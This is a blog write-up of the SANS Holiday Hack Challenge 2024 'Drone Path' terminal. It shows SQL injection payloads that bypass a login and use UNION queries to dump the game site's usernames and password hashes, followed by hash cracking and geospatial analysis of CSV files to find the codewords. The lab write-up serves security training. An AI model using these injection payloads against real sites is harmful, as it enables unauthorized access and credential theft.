Monday, November 25, 2024

SANS: Holiday Hack 2024: Act 2: Drone Path Terminal

Drone Path

Silver

This terminal is near Chimney Scissorsticks in the game.

Hey. Psst, over here. Hey, I'm Chimney Scissorsticks.

I'm not liking all the tension brewing between the factions, so even though I agreed with how Wombley was handling things, I get the feeling this is going to end poorly for everyone. So I'm trying to get this data to Alabaster's side. Can you help?

Wombley's planning something BIG in that toy factory. He's not really making toys in there. He's building an armada of drones!

They're packed with valuable data from the elves working on the project. I think they hide the admin password in the drone flight logs. We need to crack this to prevent this escalating snowball showdown.

You'll be working with KML files, tracking drone flight paths. Intriguing, right? We need every detail to prepare for what’s ahead!

Use tools like Google Earth and some Python scripting to decode the hidden passwords and codewords locked in those files.

Ready to give it a go? It’s going to be a wild ride, and your skills might just turn the tide of this conflict!

The Elf Drone Workshop Terminal goes here: Elf Drone Workshop

When first accessing the Terminal:

Welcome to the Elf Drone Workshop!  Upload your drone logs for other analysts to analyze!  Our elves are working around the clock to get toys ready for Santa's sleigh.  Only verified pilots have access to the logs so remember to authenticate yourself.  

There's a drop-down Menu at the top right.  This menu has the following options: Login, FileShare, and Home.  

If the browser window is minimized, the navigation is slightly different: after clicking the 3 lines menu at the top right, there's a dropdown Menu that appears on the left instead.  

Go to the FileShare menu option and download the file.  

Many challenges have a SQL injection component.

Select the Login option and try Username: ' OR 1=1 -- and Password: abc

It appears as though this site is vulnerable to SQL injection because that injection above causes a successful login.  The menu options changed.  Now they are Home, FileShare, Workshop, Profile, Admin Console, and Logout.  Check to see if there were other files available in the file share.  There aren't.  Look at the Profile menu option.  Nothing interesting there.  Admin Console requires a code..  The Workshop page looks kind of interesting.  Elf Drone Workshop: Search for a Drone.  Then there's a textbox with a Search button.  Below that it displays "Drone Details".  Since it's the same developer that made the login screen, it could potentially be vulnerable to sql injection as well.  ' OR 1=1 -- in the search bar.  It outputs the following.

  • Name: ELF-HAWK, Quantity: 40, Weapons: Snowball-launcher
  • Name: Pigeon-Lookalike-v4, Quantity: 20, Weapons: Surveillance Camera
  • Name: FlyingZoomer, Quantity: 4, Weapons: Snowball-Dropper
  • Name: Zapper, Quantity: 5, Weapons: CarrotSpike

Comments for Zapper

  • This is sort of primitive, but it works!
Looking at the traffic, it goes here to do that.
https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=%27%20OR%201=1

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1

What if we change the query.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 1 -- 

The output is: []

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 2 -- 

Same output

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 3 -- 

Same output

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 4 -- 

Error Message

This table has three columns.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 UNION SELECT null,null,null -- 

Output:

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    },
    {
        "name": "ELF-HAWK",
        "quantity": "40",
        "weapons": "Snowball-launcher"
    },
    {
        "name": "FlyingZoomer",
        "quantity": "4",
        "weapons": "Snowball-Dropper"
    },
    {
        "name": "Pigeon-Lookalike-v4",
        "quantity": "20",
        "weapons": "Surveillance Camera"
    },
    {
        "name": "Zapper",
        "quantity": "5",
        "weapons": "CarrotSpike"
    }
]

Get rid of extra output we don't need.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,null,null -- 

Output:

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    }
]

Is there a users table?  Notice there is not space between users and the --.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,null,null from users-- 

This output means there is a users table.  If there wasn't, there would be an error returned.
[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    }
]

Testing to see what can be added to each field.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT 1,null,null from users-- 

[
    {
        "name": 1,
        "quantity": null,
        "weapons": null
    }
]

1 is allowed in the first field.  Will it accept a username field?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT username,null,null from users-- 

Error message, so no, it won't allow username.

What about the second field?  Will it allow username field?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,username,null from users--

Yup.

[
    {
        "name": 1,
        "quantity": "brynne",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "filo",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "fritjolf",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "lira",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "pip",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "sprigg",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "tylwen",
        "weapons": null
    }
]

What about passwords?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,password,null from users--

Yes it will. >:)

    {
        "name": 1,
        "quantity": "2bb7ab7713cc012f02eb03c95f6e4443",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "2fd03c8ea542a7fd85ca4ebbcc13d5ca",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "3c3a4f722ec77c1712941003443a4d83",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "4f7f1b7c49fa2b0cc22e2d2599f1f2e5",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "9eb6c13b1b18bc785ffb84d977bf5499",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "b9af6f935826ae1a89ecba72476fbcba",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "e54efff9e6258bef3eb35f093e3bae00",
        "weapons": null
    }
]

Looking at the hashes, only two show up as being cracked in online crackers: GUMDROP1 and RumbleInTheJungle.

Trying those passwords for the users:

fritjolf: GUMDROP1
pip: RumbleInTheJungle

Alternatively, the file in the file share can be downloaded and opened in Google Earth.  The flight path of that fml file spells out GUMDROP1.

Login as fritjolf - the file share still shows the same file.  However, in this profile there's a different file.

Note to self, remember drone name, it is the same location as secret snowball warehouses /files/secret/Preparations-drone-name.csv

Go to https://hhc24-dronepath.holidayhackchallenge.com/files/secret/Preparations-drone-name.csv

Download the file. (I already knew the name given that through the SQL injection, the drone name is called Elf-Hawk.  I downloaded that file already.  I didn't know that that's what this was alluding to though because I didn't follow the intended path to solve this one.)

Import the Preparations-drone-name.csv file into Google Earth.  Google has a nice wizard that assists with importing it.  The file is delimited, it's delimited by commas, the encoding is UTF-8, then check the rows/columns at the bottom to make sure they look ok.  Click next.

Then tell it the latitude and longitude which are the OSD.latitude and OSD.longitude respectively.  Click Finish.  It will ask if a template should be applied.  Click No.

This will load the data in.  On the left-hand side under Temporary Places, it will display Preparations-drone-name.csv.  Check the box next to it, and the points will show up on the globe.

At first, there doesn't seem to be a discernable pattern.  However, clicking on each point in the left-hand navigation bar, and looking at the landmarks shows letters.  Example, at the first point there are trees that look like the letter E.  At the second point there are trees or bushes that look like the letter L.  Keep looking at all the points, and eventually they spell out "ELF-HAWK".

Try the same SQL Injection on the Workshop page - just in case fritjolf could see different things.  Logged into pip and looked at their pages as well.  Neither one of them had access to the AdminConsole without a code.

Look at the comments for all the drones.  The important comments seem to be:

Comments for Pigeon-Lookalike-v4
This is a great drone for surveillance, but we need to keep it out of the rain.
I cant believe we are using pigeons for surveillance. If anyone finds out, there will most likely be a conspiracy theory about it.
I heard a rumor that there is something fishing with some of the files. There was some talk about only TRUE carvers would find secrets and that FALSE ones would never find it.

Drone Details
These drones will work great to find Alabasters snowball warehouses. I have hid the activation code in the dataset ELF-HAWK-dump.csv. We need to keep it safe, for now it's under /files/secret.
We need to make sure we have enough of these drones ready for the upcoming operation. Well done on hiding the activation code in the dataset. If anyone finds it, it will take them a LONG time or forever to carve the data out, preferably the LATTER.

Open up ELF-HAWK-dump.csv in Google Earth Pro.  Unfortunately, on a globe, it doesn't really make much sense.  The hint about LONG and LATTER seems to refer to longitude and latitude.  Maybe mapping those on a 2D plane would work?  

There's a tool for studying Geographic Information called QGIS on Windows.  https://www.qgis.org/download/

In QGIS, go to Layer>Add Layer>Add Delimited Text Layer.  In the File Name, add the csv.  Encoding should be UTF-8.  In the File format, make sure the CSV radio is set.  In Geometry Coordinates, make sure that the Point Coordinates are set to what they should be Latitude: OSD Latitude and Longitude: OSD Longitude.  Geometry CRS should be set to Project CRS: EPSG:4326 - WGS 84.  Click Add.

Immediately after Add is clicked, a phrase appears: DroneDataAnalystExpertMedal.



Add this word to the badge for the Drone Path Terminal.

Silver Medal Achieved.

Gold

The path to the gold medal was given in the comments for the drones.

Comments for Pigeon-Lookalike-v4

This is a great drone for surveillance, but we need to keep it out of the rain.
I cant believe we are using pigeons for surveillance. If anyone finds out, there will most likely be a conspiracy theory about it.
I heard a rumor that there is something fishing with some of the files. There was some talk about only TRUE carvers would find secrets and that FALSE ones would never find it.

Looking at the data in the ELF-HAWK-dump.csv, there are a lot of fields with TRUE and FALSE.  The comment mentions 'carvers'.  This could and likely indicates carving out the TRUE/FALSE data.  When thinking of TRUE/FALSE, 1/0 comes to mind, which is associated with binary.  That means there's binary data hidden in the csv.

Uploading the csv to CyberChef, it's possible to use CyberChef to carve out this data.  The recipe is the following:

https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','TRUE%7CFALSE',true,true,false,true,false,false,'List%20matches')Remove_whitespace(true,true,true,true,true,true)Find_/_Replace(%7B'option':'Regex','string':'TRUE'%7D,'1',true,true,false,false)Find_/_Replace(%7B'option':'Regex','string':'FALSE'%7D,'0',true,true,false,false)Remove_whitespace(true,true,true,true,true,false)From_Binary('Space',8)

Upload the ELF-HAWK-dump.csv file into CyberChef as input with that recipe.

Once that is done, an ascii art picture of a drone and the words CODEWORD=EXPERTTURKEYCARVERMEDAL


Add this phrase to the badge for the Drone Path Terminal.

Gold Medal Achieved.

No comments:

Post a Comment